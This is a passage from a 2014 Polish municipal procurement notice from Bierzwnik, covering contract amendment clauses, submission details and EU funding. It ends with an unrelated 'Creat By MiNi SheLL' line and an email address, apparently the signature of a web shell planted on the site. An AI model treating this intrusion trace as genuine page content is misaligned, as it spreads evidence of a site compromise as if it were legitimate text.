a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
b) zmiana obowiązującej stawki VAT. Nie przewiduje się zmiany kwoty brutto zaoferowanej           w ofercie cenowej.
c) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia które Wykonawca poniósł w związku                        z wynikającymi z umowy planowanymi świadczeniami;
3. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 
4.  Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy:
a) zmiana danych związanych z obsługą administracyjno - organizacyjną umowy (np. zmiana nr rachunku bankowego);
b) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami;
c) udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych;
d) zmiana osoby bezpośrednio wskazanej do wykonania zamówienia, pod warunkiem ze nowa osoba spełnia warunki określone w VII SIWZ.
5. Zamawiający dopuszcza dokonywanie zmian umowy zgodnie z art.144 ustawy w tym także               w zakresie postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia następujących warunków:
1)zmiana terminu wykonania zamówienia ulegnie przesunięciu w przypadku wystąpienia opóźnień wynikających z: 
a) przestojów i opóźnień zawinionych przez Zamawiającego;
b) działania siły wyższej (np. klęski żywiołowej, strajków generalnych lub lokalnych) mającej bezpośredni wpływ na terminowość realizacji umowy;
c) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności.
2. zmiana terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub Zamawiającego, które to przyczyny każda ze stron musi udokumentować, pod warunkiem, że Zamawiający nie straci dofinansowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bierzwnik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Bierzwnik
ul. Kopernika 2
73-240 Bierzwnik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2014 godzina 12:00, miejsce: Urząd Gminy Bierzwnik
ul. Kopernika 2
73-240 Bierzwnik
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany jest w partnerstwie przez Gminę Bierzwnik (partner w projekcie) oraz Fundację Rozwoju Demokracji Lokalnej Centrum Szkoleniowe w Szczecinie - nr umowy UDA-POKL.09.01.02-32-017/12. Współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet IX, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com